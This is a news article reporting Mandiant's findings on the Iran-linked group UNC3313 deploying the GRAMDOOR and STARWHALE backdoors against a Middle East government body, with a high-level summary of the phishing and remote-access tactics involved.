Iranian Hackers Employ Telegram Malware to Target Middle East Government Organization

 

An Iran-linked hacking group, UNC3313, has been discovered deploying two new targeted malwares, tracked as GRAMDOOR and STARWHALE. These backdoors were employed as part of an assault against an unnamed Middle East government entity in November 2021. 

According to cybersecurity firm Mandiant, the UNC3313 hacking group is associated with the MuddyWater state-sponsored group. "UNC3313 conducts surveillance and collects strategic information to support Iranian interests and decision-making," researchers stated. "Targeting patterns and related lures demonstrate a strong focus on targets with a geopolitical nexus." 

Last month in January, U.S. intelligence agencies publicly categorized MuddyWater as a subordinate element of the Iranian Ministry of Intelligence and Security (MOIS) that has been active since at least 2018. UNC3313 initially gained access via spear-phishing messages, followed by the exploitation of publicly available offensive security tools and remote access software for lateral movement and maintaining access to the environment. 

 

Multiple victims were tricked into clicking a URL to download a RAR archive file stored on OneHub by the phishing emails, which opened the way for installing ScreenConnect, a genuine remote access program for gaining a foothold. 

"UNC3313 moved rapidly to establish remote access by using ScreenConnect to infiltrate systems within an hour of initial compromise," the researchers explained, adding the security incident was quickly contained and remediated. 

 

In the successive phases, threat actors escalated privileges, carried out internal reconnaissance, and attempted to download additional tools and payloads on remote systems by running obfuscated PowerShell commands. 

 

Researchers at Mandiant also spotted a previously undocumented backdoor called STARWHALE, a Windows Script File (.WSF) that implements received commands from a hardcoded command-and-control (C2) server via HTTP. 

 

The second implant unearthed by the researchers was GRAMDOOR, known for its capability to use the Telegram Bot API for network interactions with the attacker-controlled server to avoid detection, underlining the use of communication technologies to facilitate data exfiltration once again. 

 

The findings of Mandiant correlate with the latest joint advisory published by the cybersecurity firms from the U.K. and the U.S., accusing the MuddyWater group of espionage strikes aiming at the defense, local government, oil, and natural gas, and telecommunications industries worldwide.